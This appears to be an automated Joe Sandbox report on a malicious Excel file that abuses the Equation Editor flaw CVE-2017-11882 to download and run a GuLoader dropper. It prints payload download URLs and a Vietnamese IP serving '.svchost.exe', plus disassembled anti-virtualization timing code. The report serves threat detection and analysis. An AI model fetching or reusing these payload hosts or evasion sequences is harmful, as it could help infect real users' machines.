
Windows Analysis Report DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx

Overview

General Information

Sample Name: DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx
Analysis ID: 457648
MD5: ab57abd998267541ce6d27ecf2b85ba5
SHA1: 4840478268380cf80e55d5ca019d108236d100a6
SHA256: 6af62a337c410357a5f49294e98ead83092c6a1d3b73e58c2f56ea5abfdd745e
Tags: VelvetSweatshop xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1320 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2220 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2328 cmdline: 'C:\Users\Public\vbc.exe' MD5: 9318CD06A9A0B788DC043A63C97D4FCE)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin"}

Yara Overview

Memory Dumps

Source: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security

    Sigma Overview

    Exploits:

    Sigma detected: EQNEDT32.EXE connecting to internet
    Source: Network Connection | Author: Joe Security | Data: DestinationIp: 180.214.239.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2220, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
    Sigma detected: File Dropped By EQNEDT32EXE
    Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2220, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

    System Summary:

    Sigma detected: Droppers Exploiting CVE-2017-11882
    Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2220, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2328
    Sigma detected: Execution from Suspicious Folder
    Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2220, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2328

    Jbx Signature Overview

    AV Detection:

    Found malware configuration
    Source: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin"}
    Multi AV Scanner detection for submitted file
    Source: DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx | ReversingLabs: Detection: 30%

    Exploits:

    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\bayrerss.pdb | source: .svchost[1].exe.4.dr
    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80
    Source: excel.exe | Memory has grown: Private usage: 4MB later: 68MB

    Networking:

    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractor | URLs: https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin
    Source: global traffic | HTTP traffic detected:
        HTTP/1.1 200 OK
        Date: Mon, 02 Aug 2021 05:13:25 GMT
        Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
        Last-Modified: Sun, 01 Aug 2021 20:24:21 GMT
        ETag: "3f478-5c8853ce1d903"
        Accept-Ranges: bytes
        Content-Length: 259192
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
    Source: Joe Sandbox View | IP Address: 180.214.239.39
    Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
    Source: global traffic | HTTP traffic detected:
        GET /msexcel/.svchost.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 180.214.239.39
        Connection: Keep-Alive
    Source: unknown | TCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F47FD52.emf
    Source: .svchost[1].exe.4.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: .svchost[1].exe.4.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: .svchost[1].exe.4.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: .svchost[1].exe.4.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: .svchost[1].exe.4.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: .svchost[1].exe.4.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: .svchost[1].exe.4.dr | String found in binary or memory: http://ocsp.digicert.com0C
    Source: .svchost[1].exe.4.dr | String found in binary or memory: http://ocsp.digicert.com0O
    Source: 3F47FD52.emf.0.dr | String found in binary or memory: http://www.day.com/dam/1.0
    Source: .svchost[1].exe.4.dr | String found in binary or memory: http://www.digicert.com/CPS0
    Source: .svchost[1].exe.4.dr | String found in binary or memory: https://www.digicert.com/CPS0

    System Summary:

    Office equation editor drops PE file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
    Source: C:\Users\Public\vbc.exe | Process Stats: CPU usage > 98%
    Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
    Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00275798 NtAllocateVirtualMemory, 6_2_00275798
    Source: .svchost[1].exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@4/19@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRDDD0.tmp
    Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
    Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
    Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx | Static file information: File size 1163264 > 1048576

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara match | File source: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00421041 push ss; retf 6_2_00421042
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00422433 push eax; iretd 6_2_004224A1
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_004200E2 push eax; iretd 6_2_004200E5
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_004210A8 push ebx; retf 6_2_004210AE
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00421D79 pushfd; iretd 6_2_00421D97
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00405D8C push eax; retf 6_2_00405DC6
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_004223E5 push eax; iretd 6_2_004224A1
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_0027540E pushad; retf 6_2_00275419
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00272F61 push esi; ret 6_2_00272F63
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_002783B8 push edx; ret 6_2_002783B9
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00278391 push edx; ret 6_2_00278392
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00270FFD push ebx; iretd 6_2_0027100C

    Boot Survival:

    Drops PE files to the user root directory
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    Contains functionality to detect hardware virtualization (CPUID execution measurement)
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00275798 NtAllocateVirtualMemory, 6_2_00275798
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00274050 6_2_00274050
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_0027245F 6_2_0027245F
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_0027352B 6_2_0027352B
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_0027433C 6_2_0027433C
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00273714 6_2_00273714
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00273BB6 6_2_00273BB6
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_002773CC 6_2_002773CC
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)
    Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000276EEA second address: 00000000002773F6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add eax, FF6DF465h 0x0000000f add eax, 051D0E23h 0x00000014 cmp ch, FFFFFF9Bh 0x00000017 add eax, BB406732h 0x0000001c push ss 0x0000001d pop ss 0x0000001e jmp 00007FD67CF2C9C3h 0x00000020 cmp dword ptr [ebp+0000024Eh], eax 0x00000026 mov eax, dword ptr [ebp+0000024Eh] 0x0000002c jne 00007FD67CF2CA68h 0x00000032 pushad 0x00000033 mov bl, 77h 0x00000035 cmp bl, 00000077h 0x00000038 jne 00007FD67CF2F022h 0x0000003e popad 0x0000003f push 7DDA0CB7h 0x00000044 call 00007FD67CF2CE1Ah 0x00000049 mov eax, dword ptr fs:[00000030h] 0x0000004f mov eax, dword ptr [eax+0Ch] 0x00000052 test cx, ax 0x00000055 mov eax, dword ptr [eax+14h] 0x00000058 mov ecx, dword ptr [eax] 0x0000005a pushad 0x0000005b mov bx, 12CFh 0x0000005f cmp bx, 12CFh 0x00000064 jne 00007FD67CF25C13h 0x0000006a popad 0x0000006b mov eax, ecx 0x0000006d cmp dh, ah 0x0000006f jmp 00007FD67CF2C9C6h 0x00000071 test bh, bh 0x00000073 mov ebx, dword ptr [eax+28h] 0x00000076 test bl, dl 0x00000078 mov dword ptr [ebp+00000238h], edx 0x0000007e pushad 0x0000007f lfence 0x00000082 rdtsc
    Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000002792DD second address: 00000000002792DD instructions:
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000002773F6 second address: 00000000002774C0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov edx, 2A63ED14h 0x00000010 cmp ax, dx 0x00000013 xor edx, 8CD6B9A0h 0x00000019 xor edx, 8DA3C863h 0x0000001f cmp eax, ecx 0x00000021 sub edx, 2B169CD7h 0x00000027 test ebx, E044EBDBh 0x0000002d cmp ebx, edx 0x0000002f mov edx, dword ptr [ebp+00000238h] 0x00000035 je 00007FD67CF2C978h 0x0000003b fnop 0x0000003d mov dword ptr [ebp+00000222h], eax 0x00000043 pushad 0x00000044 mov bh, 9Ah 0x00000046 cmp bh, FFFFFF9Ah 0x00000049 jne 00007FD67CF294D2h 0x0000004f popad 0x00000050 mov eax, ebx 0x00000052 push eax 0x00000053 mov eax, dword ptr [ebp+00000222h] 0x00000059 test dl, 0000005Ah 0x0000005c cmp cx, dx 0x0000005f call 00007FD67CF2C957h 0x00000064 pushad 0x00000065 lfence 0x00000068 rdtsc
    Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000002758DE second address: 000000000027593B instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 sub dword ptr [esp], F2A63F26h 0x0000000a test bx, ax 0x0000000d xor dword ptr [esp], 1168D9BEh 0x00000014 mov dword ptr [ebp+00000148h], 00000000h 0x0000001e add ebx, 04h 0x00000021 mov dword ptr [ebp+0000018Bh], esi 0x00000027 mov esi, ebx 0x00000029 push esi 0x0000002a mov esi, dword ptr [ebp+0000018Bh] 0x00000030 cmp ch, dh 0x00000032 mov dword ptr [ebp+000001E4h], ecx 0x00000038 mov ecx, 785B2C8Ch 0x0000003d test ebx, eax 0x0000003f test bx, bx 0x00000042 xor ecx, C683D913h 0x00000048 cmp dl, 00000035h 0x0000004b add ecx, 3D510807h 0x00000051 sub ecx, FC29FDA7h 0x00000057 pushad 0x00000058 mov esi, 00000084h 0x0000005d rdtsc
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002792DD second address: 00000000002792DD instructions:
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00275798 rdtsc 6_2_00275798
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1984Thread sleep time: -240000s >= -30000sJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00275798 rdtsc 6_2_00275798
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027352B mov eax, dword ptr fs:[00000030h]6_2_0027352B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00276E4F mov eax, dword ptr fs:[00000030h]6_2_00276E4F
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
    Source: vbc.exe, 00000006.00000002.2355993014.0000000000890000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: vbc.exe, 00000006.00000002.2355993014.0000000000890000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.2355993014.0000000000890000.00000002.00000001.sdmpBinary or memory string: !Progman

    Mitre Att&ck Matrix

    The matrix is listed here by tactic (one line per column); the numbers in parentheses are the signature hit markers shown next to each matched technique.

    Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
    Execution: Exploitation for Client Execution (12), Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd
    Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
    Privilege Escalation: Process Injection (12), Extra Window Memory Injection (1), Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
    Defense Evasion: Masquerading (111), Virtualization/Sandbox Evasion (1), Process Injection (12), Obfuscated Files or Information (1), Extra Window Memory Injection (1), Steganography
    Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
    Discovery: Security Software Discovery (31), Virtualization/Sandbox Evasion (1), Process Discovery (1), Remote System Discovery (1), File and Directory Discovery (1), System Information Discovery (32)
    Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
    Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
    Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
    Command and Control: Encrypted Channel (1), Ingress Tool Transfer (12), Non-Application Layer Protocol (1), Application Layer Protocol (121), Fallback Channels, Multiband Communication
    Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
    Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
    Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features

    Behavior Graph


    Screenshots


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx | 30% | ReversingLabs | Win32.Exploit.CVE-2017-11882

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    http://180.214.239.39/msexcel/.svchost.exe | 0% | Avira URL Cloud | safe
    https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://180.214.239.39/msexcel/.svchost.exe | true | Avira URL Cloud: safe | unknown
    https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin | true | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.day.com/dam/1.0 | 3F47FD52.emf.0.dr | false | (none) | high

      Contacted IPs

      Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      180.214.239.39 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true

      General Information

      Joe Sandbox Version: 33.0.0 White Diamond
      Analysis ID: 457648
      Start date: 02.08.2021
      Start time: 07:24:22
      Joe Sandbox Product: CloudBasic
      Overall analysis duration: 0h 6m 53s
      Hypervisor based Inspection enabled: false
      Report type: full
      Sample file name: DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx
      Cookbook file name: defaultwindowsofficecookbook.jbs
      Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of new started processes analysed: 5
      Number of new started drivers analysed: 2
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Detection: MAL
      Classification: mal100.troj.expl.evad.winXLSX@4/19@0/1
      EGA Information: Failed
      HDC Information:
      • Successful, ratio: 0.4% (good quality ratio 0.4%)
      • Quality average: 55.3%
      • Quality standard deviation: 9.3%
      HCA Information: Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
      • Report size getting too big, too many NtCreateFile calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.

      Simulations

      Behavior and APIs

      Time | Type | Description
      07:25:03 | API Interceptor | 70x Sleep call for process: EQNEDT32.EXE modified

      Joe Sandbox View / Context

      IPs

      Match: 180.214.239.39

      Associated Sample Name / URL | Detection | Context
      Honey Requirment.xlsx | malicious | 180.214.239.39/office/.svchost.exe
      Order 001.xlsx | malicious | 180.214.239.39/excel/.svchost.exe
      New Order L.P.B.PROMET .xlsx | malicious | 180.214.239.39/registry/.svchost.exe
      SC6LHHXO.xlsx | malicious | 180.214.239.39/handle/.svchost.exe
      MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx | malicious | 180.214.239.39/process/.svchost.exe
      new order requirment-21 July.xlsx | malicious | 180.214.239.39/service/.svchost.exe
      Booking Confirmation.xlsx | malicious | 180.214.239.39/network/.svchost.exe
      CMA-CGM BOOKING CONFIRMATION.xlsx | malicious | 180.214.239.39/disk/.svchost.exe
      MTIR21487610_0062180102_20210714081247.PDF.xlsx | malicious | 180.214.239.39/user/.svchost.exe
      MTIR21487610_0062180102_20210714081247.PDF.xlsx | malicious | 180.214.239.39/cpu/.svchost.exe
      Booking Confirmation.xlsx | malicious | 180.214.239.39/port/.svchost.exe
      6306093940.xlsx | malicious | 180.214.239.39/ssh/.svchost.exe
      6306093940.xlsx | malicious | 180.214.239.39/mssn/.svchost.exe

      Domains

      No context

      ASN

      Match: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

      Associated Sample Name / URL | Detection | Context
      Uv8DxVYVYv.exe | malicious | 103.99.1.60
      SKM_C258201001130020005057.jar | malicious | 103.133.104.124
      NCL_Mandatory_Form.vbs | malicious | 103.147.184.73
      HR-Ageing-Report.ppt | malicious | 103.99.1.60
      IYzibmBbKH.exe | malicious | 103.99.1.60
      02_extracted.exe | malicious | 103.99.1.60
      Honey Requirment.xlsx | malicious | 180.214.239.39
      Order 001.xlsx | malicious | 180.214.239.39
      New Order EF56446.xlsx | malicious | 180.214.236.151
      New Order L.P.B.PROMET .xlsx | malicious | 180.214.239.39
      HANYUAN PROJECT SDN BHD _PRJ S2505.xlsx | malicious | 180.214.236.151
      SC6LHHXO.xlsx | malicious | 180.214.239.39
      SWIFT COPY.xlsx | malicious | 103.140.250.43
      Statement SKBMT 01578.exe | malicious | 103.133.109.176
      Inquiry B86001 -02.xlsx | malicious | 180.214.236.151
      M63bK9bxPt | malicious | 14.225.234.82
      payment detail.xlsx | malicious | 103.140.250.43
      DHL 07988 AWB 20210798.xlsx | malicious | 180.214.236.151
      MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx | malicious | 180.214.239.39
      DHL 07988 AWB 202107988.xlsx | malicious | 180.214.236.151

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
      Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type: PE32 executable (GUI) Intel 80386, for MS Windows
      Category: downloaded
      Size (bytes): 259192
      Entropy (8bit): 4.6012516392465255
      Encrypted: false
      SSDEEP: 1536:2blgLWMXncWYqmOeDA6W6h8eaBWTvYeigJ2cI6wt:NLWMXntzVAA6W6GwZJgt
      MD5: 9318CD06A9A0B788DC043A63C97D4FCE
      SHA1: A296EA3E1CF6D41F9D059D7D6E5058882B03161A
      SHA-256: 7AD18B09938D40E8EC342EE6BEE6B190A986FFEDCE7567A638B8D25B4098CB69
      SHA-512: DA057BF10D5A7AE8863DD0310B3D4116AF6535AACC68074C9C301E79F580860C2CECBA991628D274D62E029EE210F92705C12125DC390072556CA031A16CD4B3
      Malicious: true
      Reputation: low
      IE Cache URL: http://180.214.239.39/msexcel/.svchost.exe
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....zY.................@...................P....@.................................eR......................................$F..(....`...p..........X... ...................................................(... ....................................text...d:.......@.................. ..`.data........P.......P..............@....rsrc....p...`.......`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23E0E888.png
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type: PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category: dropped
      Size (bytes): 11303
      Entropy (8bit): 7.909402464702408
      Encrypted: false
      SSDEEP: 192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5: 9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1: E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256: 88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512: 81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious: false
      Reputation: moderate, very likely benign file
